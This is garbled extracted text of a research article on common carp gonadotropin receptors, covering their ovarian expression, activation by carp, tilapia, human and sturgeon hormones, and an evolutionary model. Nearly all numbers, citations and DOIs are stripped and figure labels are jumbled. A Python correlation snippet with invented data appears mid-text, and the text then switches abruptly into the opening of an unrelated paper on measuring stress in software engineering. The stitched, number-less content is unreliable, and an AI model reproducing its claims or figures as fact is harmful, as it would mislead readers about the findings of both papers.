the duality of fish gonadotropins and their receptors was established years ago ( ), but the evolutionary trend of specific fshr and lhcgr activation by the gonadotropins, cognate or heterologous, in different fish species is unknown. in the current study, we cloned the full-length cdnas for fshr and lhcgr of the common carp and analyzed their expression profiles during the female reproductive cycle. we additionally studied the ability of homologous and heterologous gths to activate camp signaling via the clhcgr or cfshr in an attempt to characterize a functional evolutionary model that summarizes the permissive actions of fish gthrs. the currently accepted model of the specific, distinct functions of fsh and lh in fish emerged from studies on salmonids, which spawn once in a lifetime or once a year and have synchronously developing ovaries. in the salmon, fsh and lh are discretely and temporally secreted during the reproductive cycle: fsh is mainly secreted during the long phase of vitellogenesis, and lh is secreted during final oocyte maturation and ovulation ( ). additionally, female amago salmon fshr mrna expression was high during the early stages of vitellogenesis and gradually decreased as gonadal maturation ensued, while lhcgr expression peaked during final maturation ( ).
similar seasonal patterns were reported in the oogenesis of another synchronous figure  carp gonadotropin receptors stimulated by recombinant gonadotropins of human (a and b), tilapia (c and d) or sturgeon (e and f). cos- cells were transiently co-transfected with clhcgr (a, c and e) or cfshr (b, d and f) and with the reporter plasmid pcre-luc. cells were stimulated for  h with graded concentrations of tilapia (t), human (h), and sturgeon (st) recombinant gonadotropins. luciferase activity was determined and results are presented as a ratio to basal stimulation. each assay was repeated at least three times. data are presented as mean ± s.e.m. of a representative experiment, performed in triplicate. this work is licensed under a creative commons attribution-noncommercial . international license.https://doi.org/ . /ec- - https://ec.bioscientifica.com © the authors published by bioscientifica ltd downloaded from bioscientifica.com at / / : : pm via free access https://creativecommons.org/licenses/by-nc/ . / https://creativecommons.org/licenses/by-nc/ . / https://doi.org/ . /ec- - https://ec.bioscientifica.com l hollander-cohen et al. ontogeny of the specificity of fish gth-rs : spawner, the channel catfish ( ). however, the carp is a total spawner; i.e., when maturation of the gonads begins, all the eggs or sperm develop synchronously. hormonal levels, histological observations and gene expression revealed that for the carp, oocytes during the cortical alveolus stage appeared when follicle diameter was – µm, vitellogenesis then started and was completed when follicle diameter was – during february. the spawning season was between april and june, which corresponded with a significant increase in the gsi, dhp, and estradiol levels ( , ). however, although the carp is a total spawner, mrna levels of both fshr and lhcgr were low during vitellogenesis and increased concomitantly toward oocyte maturation, where fshr level increased earlier than lhcgr. in the ovary of the rohu (labeo rohita), an indian carp which is also a total- spawner, fshr gene expression was also enhanced from the primary growth stage to the pre-spawning phase and maintained at the same level during the spawning phase, while lhcgr expression enhanced from the primary growth stage to pre-spawning phase, reaching a peak at the spawning phase ( ). this is in accordance with our previous results showing that lh pituitary content and mrna levels were low at pre- and early vitellogenesis, reached a peak in mid-vitellogenic ovary, and a peak of lh content in fully grown ovarian follicles ( ). however, no significant change occurred in fsh pituitary content and mrna levels between vitellogenic fish and fish at the figure  changes in fshr and lhcgr mrna expression in the ovary at various stages of gonadal maturation as determined by real-time pcr. fold expression was normalized to the geometric mean of ef- α and β-actin by the comparative threshold cycle method (∆ct). results are shown as mean ± s.e.m. (n =  – ). means marked with different capital letters have statistically different lhcgr expression, and means marked with different lower-case letters differ significantly in fshr expression (p <  . ). the ovarian developmental stage of each fish was determined with hematoxylin and eosin-stained histological sections of carp ovary in different maturation phases according to oocyte diameter; the stages are represented in the bottom of the graph. the primary growth (pg) stage contains mainly prenuclear follicles with big central nucleus. 
the previtellogenic (pv) stage contains some larger follicles with cortical alveoli in their cytoplasm. the early vitellogenic (ev) stage contains large follicles with oil vacuoles and yolk granules accumulated in the cytoplasm. the mid- vitellogenic (mv) stage contains follicles where the germinal vesicle starts its migration to the periphery and the yolk granules become yolk plates. mature follicles (mf) went through the dehydration stage where the follicle reaches to its maximum growth. table  correlation tests between the mrna levels of the gonadotropin receptors and the mrna levels of the gonadotropins ( ) and gsi. lhβ fshβ clhcgr gsi vs fshβ vs clhr vs cfshr vs clhr vs cfshr vs cfshr clhr cfshr number of xy pairs pearson r . . . . . . . . p value (two-tailed) . . . . . . < . < . p value summary a a ns ns a b b b is the correlation significant? (alpha =  . ) yes yes no no yes yes yes yes r squared . . . . . . . . correlation was performed using graphpad prism program v . ap< . ; bp< . . this work is licensed under a creative commons attribution-noncommercial . international license.https://doi.org/ . /ec- - https://ec.bioscientifica.com © the authors published by bioscientifica ltd downloaded from bioscientifica.com at / / : : pm via free access https://creativecommons.org/licenses/by-nc/ . / https://creativecommons.org/licenses/by-nc/ . / https://doi.org/ . /ec- - https://ec.bioscientifica.com l hollander-cohen et al. ontogeny of the specificity of fish gth-rs pb– : final stages of maturation ( ). in goldfish too, lh was found to be present throughout the reproductive cycle, leading to the conclusion that mainly lh was involved in regulating gonadal steroidogenesis, gametogenesis, and ovulation ( ). in line with these data, increases in fshr gene expression have been correlated with later events of the reproductive cycle including the oocyte maturation and ovulation in the rainbow trout ( ), zebrafish ( ) and tilapia ( ). these data suggest that piscine gonad development and maturation depends on a specific gonadotropin profile that does not reflect the temporally distinct dual-gonadotropin model observed in salmonids or mammals. dhp is known as the maturation-inducing steroid in most fish species (reviewed in ( )). one of the major endocrine events associated with termination of vitellogenesis and meiosis resumption is an lh-driven shift in the ovarian follicle steroidogenic pathway from the production of predominantly estradiol during vitellogenesis to the production of dhp ( ). this switch is associated with decreased expression of cytochrome p aromatase ( ). we show here that both recombinant cfsh and clh successfully induced gvbd in the carp. similar results were found in the walking catfish where both semi-purified lh and fsh induced gvbd in vitro ( ). moreover, dhp levels significantly increased in response to both gonadotropins, while estradiol decreased only in response to recombinant cfsh. we previously showed that injection of the resolving high dose of cpe resulted in a shift in the main ovarian steroid from estradiol to dhp ( ). incubation of carp ovarian fragments with both fsh and lh from various piscine sources also resulted in an increase of both estradiol and dhp secretion ( ). the acquisition of follicular maturational competence that naturally occurs during post-vitellogenesis in the carp also corresponds to an increase of follicular responsiveness to both gonadotropins. 
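the correlation table earlier in this section reports pearson r, two-tailed p values, and r² for each pair of variables (pituitary gonadotropin subunit mrna, ovarian receptor mrna, and gsi). as a minimal illustration of how such values are obtained, the sketch below computes them with scipy for one hypothetical pair; the numbers are invented and do not correspond to the study's data.

```python
import numpy as np
from scipy import stats

# Invented paired measurements for a single comparison (illustration only):
# ovarian lhcgr expression (relative units) versus gonadosomatic index (GSI, %).
lhcgr_expr = np.array([0.2, 0.5, 1.1, 2.3, 3.8, 4.1, 5.0, 6.2])
gsi        = np.array([1.0, 1.4, 3.2, 6.5, 9.8, 11.2, 13.5, 15.1])

r, p_two_tailed = stats.pearsonr(lhcgr_expr, gsi)
print(f"Pearson r = {r:.2f}, r^2 = {r ** 2:.2f}, p (two-tailed) = {p_two_tailed:.4g}")
```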
taken together, these data suggest that fsh induces dhp production/secretion not through binding to the lhcgr, but rather through cognate binding to fshr, which results in dhp secretion. it is accepted that receptor binding domains and their ligands experience co-evolution, where reciprocal restrictions are applied over evolutionary time ( ). previously, fish gth specificity has been viewed from too broad a perspective, under the assumption that evolutionary rate and polyploidization of the genome contribute to permissive gthr activation. the gonadotropin beta subunits are encoded by paralogous genes descending from a common ancestor and share about % sequence identity (for both human and carp). the corresponding receptors are also encoded by paralogous genes and, accordingly, they also display about % sequence identity in their hormone-binding ectodomain. in contrast, the effector domains of the receptors share higher sequence identity (about % for both human and carp), which suggests that they fulfill essentially the same function – activation of gαs. the hypothesis that earlier evolved lineages have a more fundamental gthr sequence that would facilitate the activation of any later evolved gth has received mixed support ( , , ).

[figure: induced maturation progress of common carp ovarian follicles after stimulation in the germinal vesicle breakdown assay, applying carp pituitary extract (cpe) (a), recombinant clh (r-clh) (b) and recombinant cfsh (r-cfsh) (c); panels plot the percentage of oocytes at maturational stages i–iii, iv and v against cpe dilution (pit/ml) or gonadotropin dose (ng/ml). data are presented as mean ± s.e.m.; statistically significant differences between treatments and control are highlighted with * (p < . ).]
ng/pit of cfsh (a and d), recombinant cfsh (r-cfsh; b and e) and recombinant clh (r-clh; c and f) on e (a, b and c) and dhp (d, e and f) secretion in vitro by intact preovulated ovarian follicles. each point represents the mean ± s.e.m. of follicles from three different fish per treatment group, with three replicates (n =  ). means marked by different letters differ significantly (p <  . ). . . . . a a a a a cpe dilutions e [p g/ fo lli cl e] a b b b b rfsh (ng/ml) e [p g/ fo lli cl e] a a a a a rlh (ng/ml) rlh (ng/ml) e [p g/ fo lli cl e] . . . . . . . . . . . . a a a a a cpe dilutions d h p [p g/ fo lli cl e] aa b b c rfsh (ng/ml) d h p [p g/ fo lli cl e] . . . . . . . . . . a a b b b d h p [p g/ fo lli cl e] a b c d e f figure  a model describing the specificity of gonadotropins binding to their cognate receptors in representative species of fish from different piscine orders. the taxonomic tree and the selection of different order groups was done using taxonomy browser (ncbi) and the design was performed in evolview (http:// www.evolgenius.info/evolview). this model was created using studies where homologous recombinant gonadotropins were used: ( ) for the rainbow trout (oncorhynchus mykiss); ( ) for zebrafish, ( , ) for african catfish (clarias gariepinus), ( , ) for sea bass (dicentrarchus labrax); ( ) for mummichog (fundulus heteroclitus); ( ) for eel, tilapia and human; ( ) for atlantic halibut (hippoglossus hippoglossus); ( ) for amago salmon (oncorhynchus rhodurus); ( ) for manchurian trout (brachymystax lenok); and ( ) for elephant shark (callorhinchus milii). this work is licensed under a creative commons attribution-noncommercial . international license.https://doi.org/ . /ec- - https://ec.bioscientifica.com © the authors published by bioscientifica ltd downloaded from bioscientifica.com at / / : : pm via free access http://www.evolgenius.info/evolview http://www.evolgenius.info/evolview https://creativecommons.org/licenses/by-nc/ . / https://creativecommons.org/licenses/by-nc/ . / https://doi.org/ . /ec- - https://ec.bioscientifica.com l hollander-cohen et al. ontogeny of the specificity of fish gth-rs pb– : implicating a functionally basic property of these gthrs. however, these functional observations are complicated by a complex evolutionary history of the teleosts which may or may not have a demonstrated trend. in the view of the expansive teleost radiation, it seems most appropriate to conclude that permissive gthr activation is a consequence of lineage-specific, biologically relevant events, and not a less-evolved theme for the entire infraclass (fig. ). the response of the clhcgr to the homologous pituitary extract was twice that for cfshr. this can be due to the higher levels of clh in the pituitary ( ), and also to the higher number of lh-secreting cells in the pituitary of mature fish as was shown for zebrafish and tilapia ( , ). the clhcgr and cfshr ecds have a more neutral concave surface potential, but differ in the ecd terminals where clhcgr has strong basic and acidic propensities on the n- and c-terminal sides of the ecd, respectively, and the cfshr has a weaker acidic n-terminal propensity that covers more surface than clhcgr and a weakly basic c-terminus. we showed that recombinant clh and cfsh both activate cfshr, but clhcgr was only activated by its cognate ligand. we also observed heterologous activation of clhcgr with tilapia and human fsh and cfshr with sturgeon lh. 
interestingly, stfsh and hcg did not activate clhcgr and cfshr, respectively, perhaps alluding to some species-specific binding and activation determinants. the generally weaker proximal charges of the cfshr ecd could permit more permissive initial binding, but recognition specificity is not equivalent to functional specificity. the lrr domain is involved in initial recognition and binding to the receptor; however, the signal specificity domain (ssd; ‘hinge’) and the extracellular loops of the tmd bridge the gap between hormone binding and receptor activation ( ). the ssd is located between the last repeat of the lrr domain and the first helix of the tmd, and provides a high-affinity binding site in addition to the lrr domain ( ). it is characterized by having two highly conserved cysteine-rich boxes (cb- and cb- ) that form important disulfide bridges and key determinant residues for hormone binding and receptor conformational changes ( ). teleost fshrs lack approximately amino acids between conserved cysteine and of cb- / compared with human and chicken fshr, resulting in a shorter hinge loop that could influence the degree of secondary ligand binding and activation. this same region in the lhcgr of teleosts is variable in size, but is longer than their fshr counterparts. a conserved sulfated tyrosine residue (y of hfshr, y of hlhcgr) found in the ssd is indispensable for binding and subsequent activation ( ). the principal binding of a gph to the lrr domain causes a low-structured loop of the ssd containing the sulfated tyrosine to move into an exposed hydrophobic pocket between the alpha and beta subunits of the gph ( ). clhcgr and fshr do have conserved tyrosine residues in this region (y and y , respectively), but there are no data addressing the presence of a sulfate moiety on these residues in fish. the differences in overall electrostatic potential of the ecd, length of the ssd, and various binding residues between clhcgr and cfshr contribute to the permissive actions of these receptors, but further experimentation will be required in order to determine the exact factors that govern gth binding specificity in fish. we have demonstrated here that the specific role of the two gonadotropins might be different in carp than in the accepted model. our data support the hypothesis that fish gonadotropin and receptor expression and interaction profiles are different than those of other vertebrate lineages due to the vast radiation of teleosts and their reproductive strategies in diverse ecological niches. furthermore, we suggest that the permissive activation of the fish gonadotropin receptors, which was previously attributed to all fish species, is mainly a characteristic of ostariophysi species. supplementary data this is linked to the online version of the paper at https://doi.org/ . / ec- - . declaration of interest the authors declare that there is no conflict of interest that could be perceived as prejudicing the impartiality of the research reported. funding this project has received funding from the european union’s horizon research and innovation program under the marie sklodowska-curie grant agreement no – impress. knh was supported by bard, the united states – israel binational agricultural research and development fund, vaadia-bard postdoctoral fellowship award no. fu- - . references levavi-sivan b, bogerd j, mananos el, gomez a & lareyre jj. perspectives on fish gonadotropins and their receptors. general and comparative endocrinology – . (https://doi. org/ . /j.ygcen. . . 
) pierce jg & parsons tf. glycoprotein hormones: structure and function. annual review of biochemistry – . (https:// doi.org/ . /annurev.bi. . . ) braun t, schofield pr & sprengel r. amino-terminal leucine- rich repeats in gonadotropin receptors determine hormone selectivity. embo journal – . (https://doi. org/ . /j. - . .tb .x) this work is licensed under a creative commons attribution-noncommercial . international license.https://doi.org/ . /ec- - https://ec.bioscientifica.com © the authors published by bioscientifica ltd downloaded from bioscientifica.com at / / : : pm via free access https://doi.org/ . /ec- - https://doi.org/ . /ec- - https://doi.org/ . /j.ygcen. . . https://doi.org/ . /j.ygcen. . . https://doi.org/ . /annurev.bi. . . https://doi.org/ . /annurev.bi. . . https://doi.org/ . /j. - . .tb .x https://doi.org/ . /j. - . .tb .x https://creativecommons.org/licenses/by-nc/ . / https://creativecommons.org/licenses/by-nc/ . / https://doi.org/ . /ec- - https://ec.bioscientifica.com l hollander-cohen et al. ontogeny of the specificity of fish gth-rs : yaron z. endocrine control of gametogenesis and spawning induction in the carp. aquaculture – . (https://doi. org/ . / - ( ) -h) jones dt, taylor wr & thornton jm. the rapid generation of mutation data matrices from protein sequences. computer applications in the biosciences – . (https://doi. org/ . /bioinformatics/ . . ) kumar s, stecher g & tamura k. mega : molecular evolutionary genetics analysis version . for bigger datasets. molecular biology and evolution – . (https://doi.org/ . /molbev/ msw ) roy a, kucukural a & zhang y. i-tasser: a unified platform for automated protein structure and function prediction. nature protocols – . (https://doi.org/ . /nprot. . ) zhang y. i-tasser server for protein d structure prediction. bmc bioinformatics . (https://doi.org/ . / - - - ) hollander-cohen l, golan m, aizen j, shpilman m & levavi- sivan b. characterization of carp gonadotropins: structure, annual profile, and carp and zebrafish pituitary topographic organization. general and comparative endocrinology – . (https://doi. org/ . /j.ygcen. . . ) levavi-zermonsky b & yaron z. changes in gonadotropin and ovarian-steroids associated with oocytes maturation during spawning induction in the carp. general and comparative endocrinology – . (https://doi.org/ . / - ( ) - ) biran j, ben-dor s & levavi-sivan b. molecular identification and functional characterization of the kisspeptin/kisspeptin receptor system in lower vertebrates. biology of reproduction – . (https://doi.org/ . /biolreprod. . ) sivakumaran kp, brown p, stoessel d & giles a. maturation and reproductive biology of female wild carp, cyprinus carpio, in victoria, australia. environmental biology of fishes – . (https:// doi.org/ . /a: ) vazirzadeh a, amiri bm & fostier a. ovarian development and related changes in steroid hormones in female wild common carp (cyprinus carpio carpio), from the south-eastern caspian sea. journal of animal physiology and animal nutrition – . (https://doi.org/ . /jpn. ) yaron z & levavi-zermonsky b. fluctuations in gonadotropin and ovarian-steroids during the annual cycle and spawning of the common carp. fish physiology and biochemistry – . (https://doi.org/ . /bf ) levavi-sivan b, biran j & fierman e. sex steroids are involved in the regulation of gonadotropin-releasing hormone and dopamine d receptors in female tilapia pituitary. biology of reproduction – . (https://doi.org/ . /biolreprod. . ) deloffre la, andrade a, filipe ai & canario avm. 
reference genes to quantify gene expression during oogenesis in a teleost fish. gene – . (https://doi.org/ . /j.gene. . . ) guzman jm, luckenbach ja, yamamoto y & swanson p. expression profiles of fsh-regulated ovarian genes during oogenesis in coho salmon. plos one e . (https://doi.org/ . /journal. pone. ) levavi-sivan b, aizen j & avitan a. cloning, characterization and expression of the d dopamine receptor from the tilapia pituitary. molecular and cellular endocrinology – . (https://doi. org/ . /j.mce. . . ) aizen j, kobayashi m, selicharova i, sohn yc, yoshizaki g & levavi- sivan b. steroidogenic response of carp ovaries to piscine fsh and lh depends on the reproductive phase. general and comparative endocrinology – . (https://doi.org/ . /j. ygcen. . . ) kasuto h & levavi-sivan b. production of biologically active tethered tilapia lhβα by the methylotrophic yeast pichia pastoris. general and comparative endocrinology – . (https://doi. org/ . /j.ygcen. . . ) aizen j, kasuto h, golan m, zakay h & levavi-sivan b. tilapia follicle-stimulating hormone (fsh): immunochemistry, stimulation by gonadotropin-releasing hormone, and effect of biologically active recombinant fsh on steroid secretion. biology of reproduction – . (https://doi.org/ . /biolreprod. . ) yom-din s, hollander-cohen l, aizen j, boehm b, shpilman m, golan m, hurvitz a, degani g & levavi-sivan b. gonadotropins in the russian sturgeon: their role in steroid secretion and the effect of hormonal treatment on their secretion. plos one e . (https://doi.org/ . /journal.pone. ) aizen j, hollander-cohen l, shpilman m & levavi-sivan b. biologically active recombinant carp lh as a spawning inducing agent for carp. journal of endocrinology – . (https:// doi.org/ . /joe- - ) miwa s, yan lg & swanson p. localization of two gonadotropin receptors in the salmon gonad by in vitro ligand autoradiography. biology of reproduction – . (https://doi.org/ . / biolreprod . . ) swanson p, dickey jt & campbell b. biochemistry and physiology of fish gonadotropins. fish physiology and biochemistry – . (https://doi.org/ . /b:fish. . . ) hirai t, oba y & nagahama y. fish gonadotropin receptors: molecular characterization and expression during gametogenesis. fisheries science – . (https://doi.org/ . /fishsci. . sup _ ) kumar gs, singh isb & philip r. development of a cell culture system from the ovarian tissue of african catfish (clarias gariepinus). aquaculture – . (https://doi.org/ . /s - ( ) - ) pradhan a, nayak m, samanta m, panda rp, rath sc, giri ss & saha a. gonadotropin receptors of labeo rohita: cloning and characterization of full-length cdnas and their expression analysis during annual reproductive cycle. general and comparative endocrinology – . (https://doi.org/ . /j. ygcen. . . ) aizen j, kasuto h & levavi-sivan b. development of specific enzyme- linked immunosorbent assay for determining lh and fsh levels in tilapia, using recombinant gonadotropins. general and comparative endocrinology – . (https://doi.org/ . /j. ygcen. . . ) trudeau vl. neuroendocrine regulation of gonadotrophin ii release and gonadal growth in the goldfish, carassius auratus. reviews of reproduction – . (https://doi.org/ . /ror. . ) bobe j, maugars g, nguyen t, rime h & jalabert b. rainbow trout follicular maturational competence acquisition is associated with an increased expression of follicle stimulating hormone receptor and insulin-like growth factor messenger rnas. molecular reproduction and development – . (https://doi.org/ . / mrd. ) kwok hf, so wk, wang y & ge w. 
zebrafish gonadotropins and their receptors: i. cloning and characterization of zebrafish follicle-stimulating hormone and luteinizing hormone receptors- evidence for their distinct functions in follicle development. biology of reproduction – . (https://doi.org/ . / biolreprod. . ) nagahama y & yamashita m. regulation of oocyte maturation in fish. development, growth and differentiation s –s . (https://doi.org/ . /j. - x. . .x) scott ap, sumpter jp & hardiman pa. hormone changes during ovulation in the rainbow trout (salmo gairdneri richardson). general and comparative endocrinology – . (https://doi. org/ . / - ( ) - ) sarkar s, bhattacharya d, juin sk & nath p. biological properties of indian walking catfish (clarias batrachus) (l.) gonadotropins in female reproduction. fish physiology and biochemistry – . (https://doi.org/ . /s - - - ) this work is licensed under a creative commons attribution-noncommercial . international license.https://doi.org/ . /ec- - https://ec.bioscientifica.com © the authors published by bioscientifica ltd downloaded from bioscientifica.com at / / : : pm via free access https://doi.org/ . / - ( ) -h https://doi.org/ . / - ( ) -h https://doi.org/ . /bioinformatics/ . . https://doi.org/ . /bioinformatics/ . . https://doi.org/ . /molbev/msw https://doi.org/ . /molbev/msw https://doi.org/ . /nprot. . https://doi.org/ . / - - - https://doi.org/ . /j.ygcen. . . https://doi.org/ . /j.ygcen. . . https://doi.org/ . / - ( ) - https://doi.org/ . /biolreprod. . https://doi.org/ . /a: https://doi.org/ . /a: https://doi.org/ . /jpn. https://doi.org/ . /bf https://doi.org/ . /biolreprod. . https://doi.org/ . /j.gene. . . https://doi.org/ . /journal.pone. https://doi.org/ . /journal.pone. https://doi.org/ . /j.mce. . . https://doi.org/ . /j.mce. . . https://doi.org/ . /j.ygcen. . . https://doi.org/ . /j.ygcen. . . https://doi.org/ . /j.ygcen. . . https://doi.org/ . /j.ygcen. . . https://doi.org/ . /biolreprod. . https://doi.org/ . /journal.pone. https://doi.org/ . /joe- - https://doi.org/ . /joe- - https://doi.org/ . /biolreprod . . https://doi.org/ . /biolreprod . . https://doi.org/ . /b:fish. . . https://doi.org/ . /fishsci. .sup _ https://doi.org/ . /fishsci. .sup _ https://doi.org/ . /s - ( ) - https://doi.org/ . /s - ( ) - https://doi.org/ . /j.ygcen. . . https://doi.org/ . /j.ygcen. . . https://doi.org/ . /j.ygcen. . . https://doi.org/ . /j.ygcen. . . https://doi.org/ . /ror. . https://doi.org/ . /mrd. https://doi.org/ . /mrd. https://doi.org/ . /biolreprod. . https://doi.org/ . /biolreprod. . https://doi.org/ . /j. - x. . .x https://doi.org/ . / - ( ) - https://doi.org/ . / - ( ) - https://doi.org/ . /s - - - https://creativecommons.org/licenses/by-nc/ . / https://creativecommons.org/licenses/by-nc/ . / https://doi.org/ . /ec- - https://ec.bioscientifica.com l hollander-cohen et al. ontogeny of the specificity of fish gth-rs pb– : moyle wr, campbell rk, myers rv, bernard mp, han y & wang x. co-evolution of ligand-receptor pairs. nature – . (https://doi.org/ . / a ) hausken kn, tizon b, shpilman m, barton s, decatur w, plachetzki d, kavanaugh s, ul-hasan s, levavi-sivan b & sower sa. cloning and characterization of a second lamprey pituitary glycoprotein hormone, thyrostimulin (gpa /gpb ). general and comparative endocrinology – . (https://doi. org/ . /j.ygcen. . . ) buechi hb & bridgham jt. evolution of specificity in cartilaginous fish glycoprotein hormones and receptors. general and comparative endocrinology – . (https://doi.org/ . /j. ygcen. . . 
) aizen j, kowalsman n, kobayashi m, hollander l, sohn yc, yoshizaki g, niv my & levavi-sivan b. experimental and computational study of inter- and intra-species specificity of gonadotropins for various gonadotropin receptors. molecular and cellular endocrinology – . (https://doi.org/ . /j. mce. . . ) rocha a, gomez a, zanuy s, cerda-reverter jm & carrillo m. molecular characterization of two sea bass gonadotropin receptors: cdna cloning, expression analysis, and functional activity. molecular and cellular endocrinology – . (https://doi. org/ . /j.mce. . . ) so wk, kwok hf & ge w. zebrafish gonadotropins and their receptors: ii. cloning and characterization of zebrafish follicle- stimulating hormone and luteinizing hormone subunits – their spatial-temporal expression patterns and receptor specificity. biology of reproduction – . (https://doi.org/ . / biolreprod. . ) vischer hf, granneman jcm, linskens mhk, schulz rw & bogerd j. both recombinant african catfish lh and fsh are able to activate the african catfish fsh receptor. journal of molecular endocrinology – . (https://doi.org/ . /jme. . ) vischer hf, teves acc, ackermans jcm, van dijk w, schulz rw & bogerd j. cloning and spatiotemporal expression of the follicle- stimulating hormone beta subunit complementary dna in the african catfish (clarias gariepinus). biology of reproduction – . (https://doi.org/ . /biolreprod. . ) golan m, martin ao, mollard p & levavi-sivan b. anatomical and functional gonadotrope networks in the teleost pituitary. scientific reports . (https://doi.org/ . /srep ) golan m, zelinger e, zohar y & levavi-sivan b. architecture of gnrh-gonadotrope-vasculature reveals a dual mode of gonadotropin regulation in fish. endocrinology – . (https://doi. org/ . /en. - ) smits g, campillo m, govaerts c, janssens v, richter c, vassart g, pardo l & costagliola s. glycoprotein hormone receptors: determinants in leucine-rich repeats responsible for ligand specificity. embo journal – . (https://doi.org/ . /emboj/ cdg ) brüser a, schulz a, rothemund s, ricken a, calebiro d, kleinau g & schöneberg t. the activation mechanism of glycoprotein hormone receptors with implications in the cause and therapy of endocrine diseases. journal of biological chemistry – . (https:// doi.org/ . /jbc.m . ) jiang x, dias ja & he x. structural biology of glycoprotein hormones and their receptors: insights to signaling. molecular and cellular endocrinology – . (https://doi.org/ . /j. mce. . . ) costagliola s, urizar e, mendive f & vassart g. specificity and promiscuity of gonadotropin receptors. reproduction – . (https://doi.org/ . /rep. . ) sambroni e, le gac f, breton b & lareyre jj. functional specificity of the rainbow trout (oncorhynchus mykiss) gonadotropin receptors as assayed in a mammalian cell line. journal of endocrinology – . (https://doi.org/ . /joe- - ) kumar rs, ijiri s & trant jm. molecular biology of the channel catfish gonadotropin receptors: . complementary dna cloning, functional expression, and seasonal gene expression of the follicle- stimulating hormone receptor. biology of reproduction – . (https://doi.org/ . /biolreprod . . ) moles g, zanuy s, munoz i, crespo b, martinez i, mananos e & gomez a. receptor specificity and functional comparison of recombinant sea bass (dicentrarchus labrax) gonadotropins (fsh and lh) produced in different host systems. biology of reproduction – . (https://doi.org/ . /biolreprod. . ) ohkubo m, yabu t, yamashita m & shimizu a. 
molecular cloning of two gonadotropin receptors in mummichog fundulus heteroclitus and their gene expression during follicular development and maturation. general and comparative endocrinology – . (https://doi.org/ . /j.ygcen. . . ) kobayashi t & andersen Ø. the gonadotropin receptors fsh-r and lh-r of atlantic halibut (hippoglossus hippoglossus): isolation of multiple transcripts encoding full-length and truncated variants of fsh-r. general and comparative endocrinology – . (https://doi.org/ . /j.ygcen. . . ) oba y, hirai t, yoshiura y, yoshikuni m, kawauchi h & nagahama y. the duality of fish gonadotropin receptors: cloning and functional characterization of a second gonadotropin receptor cdna expressed in the ovary and testis of amago salmon (oncorhynchus rhodurus). biochemical and biophysical research communications – . (https://doi.org/ . /bbrc. . ) ko h, park w, kim dj, kobayashi m & sohn yc. biological activities of recombinant manchurian trout fsh and lh: their receptor specificity, steroidogenic and vitellogenic potencies. journal of molecular endocrinology – . (https://doi.org/ . /jme. . )

received in final form september; accepted october; accepted preprint published online october.
a methodology for psycho-biological assessment of stress in software engineering jan-peter ostberg, daniel graziotin, stefan wagner and birgit derntl institute of software engineering, university of stuttgart, stuttgart, germany department of psychiatry and psychotherapy, university of tübingen, tübingen, germany abstract stress pervades our everyday life to the point of being considered the scourge of the modern industrial world. the effects of stress on knowledge workers cause, in the short term, performance fluctuations, decline of concentration, bad sensorimotor coordination, and an increased error rate, while long-term exposure to stress leads to issues such as dissatisfaction, resignation, depression and general psychosomatic ailment and disease. software developers are known to be stressed workers. stress has been suggested to have detrimental effects on team morale and motivation, communication and cooperation-dependent work, software quality, maintainability, and requirements management. there is a need to effectively assess, monitor, and reduce stress for software developers. while there is substantial psycho-social and medical research on stress and its measurement, we notice that the transfer of these methods and practices to software engineering has not been fully made. for this reason, we engage in an interdisciplinary endeavor between researchers in software engineering and medical and social sciences towards a better understanding of stress effects while developing software. this article offers two main contributions. first, we provide an overview of supported theories of stress and the many ways to assess stress in individuals. second, we propose a robust methodology to detect and measure stress in controlled experiments that is tailored to software engineering research. we also evaluate the methodology by implementing it on an experiment, which we first pilot and then replicate in its enhanced form, and report on the results with lessons learned. with this work, we hope to stimulate research on stress in software engineering and inspire future research that is backed up by supported theories and employs psychometrically validated measures. subjects bioinformatics, human-computer interaction, software engineering keywords stress, software development, biological markers, methodology, psychological assessment, effects of stress introduction our modern industrialized world is moving fast and demands a lot from the workers within its system, which leaves them stressed out. some consider stress the scourge of the modern industrial world (de jonge et al., ).
stress is a response to exceeding demands placed upon the body or mind (selye, ). it is well known that stress is highly related to the deterioration of physical and mental health (sonnentag et al., ; kaufmann, pornschlegel & udris, ). individuals who perceive a large amount of stress have an increased risk of premature death, coronary heart disease, and mental disorders such as depression or burn-out, as the world health organization recognized early on (world health organization and others, ) and has continued to investigate (world health organization, ). stress, as well as the mere anticipation of stress (hyun, sliwinski & smyth, ), also has a negative impact on the quality of products, as it increases workers' error rates (akula & cusick, ). workplace environments that are characterized by physical work have been improved over time by research on ergonomic tools as well as their placement to lessen physical strain, and by alternation of tasks and restructuring of processes to counter dulling repetitive work. the aim is the replenishment of physical and cognitive resources which were consumed by the stressful tasks. still, the stress experienced by knowledge workers, like software developers, offers a wide range of research opportunities in terms of understanding and preventing the generation of (chronic) stress and its effects (meier et al., ; ostberg et al., ). software developers are stressed workers. short time to market, requirements originating from legislators leading to high penalty payments, fast-changing technological environments (chilton, hardgrave & armstrong, ), the need to plan for software legacy and obsolescence, interaction with customers (rajeswari & anantharaman, ), as well as possible time zone, linguistic, and cultural differences (amin et al., ) are just the tip of the iceberg for potential long-term stressors in software development. day-to-day stressors such as cryptic error messages, unintuitive integrated development environments (ides), and changing requirements which cause high cognitive strain should be kept as low as possible to avoid an additional burden to body and mind (graziotin et al., ). stress has been suggested to have detrimental effects on defect rates, team morale as well as motivation, software quality, maintainability, and requirements management (meier et al., ). while short-term stress can be pushing and beneficial to software engineers, preliminary research suggests that we should find ways to reduce stress and develop tools for software development that help to reduce stress or at least are no sources of stress (brown et al., ).
we discussed ways to reduce stress of developers elsewhere (ostberg et al., ), but without strong and validated, yet easy to adopt, methodologies to detect, assess, and understand stress responses of individuals and groups of developers, it is hard to produce sound statements on the efficiency of any stress reduction approach. for detecting stress, research in software engineering has focused on machine learning and data mining approaches, wearable technologies (suni lopez, condori-fernández & catala bolos, ), and ad-hoc questionnaires (meier et al., ) so far. brown et al. ( ) have offered a review of the few scattered studies—but we still see some research gaps, which we highlight in the next section, in terms of discovered knowledge as well as the way we borrow from established research from other disciplines. hence, we are motivated to engage in an interdisciplinary endeavor between researchers in software engineering as well as medical and social science fields towards a better understanding of stress while developing software. this article offers two main contributions. first, we provide an overview of supported theories of stress and the many ways to assess stress in individuals. second, we propose a robust methodology to detect and measure stress in controlled experiments that is tailored to software engineering research. the methodology has been supported by two controlled experiments which we report on together with lessons learned. with this work, we hope to stimulate research on stress in software engineering and inspire future research that is backed up by supported theories and employs psychometrically validated measurement instruments. related work there is substantial psycho-social and medical research on stress and its measurement (brown et al., ), but the transfer to software engineering has yet to be made. this is also due to the many medical, psychological, and biological ways to measure stress and to report the results (noack et al., ), creating the need for interdisciplinary work, which increases the complexity of research projects. furthermore, we believe that solid theoretical and methodological foundations should be a first step towards a better 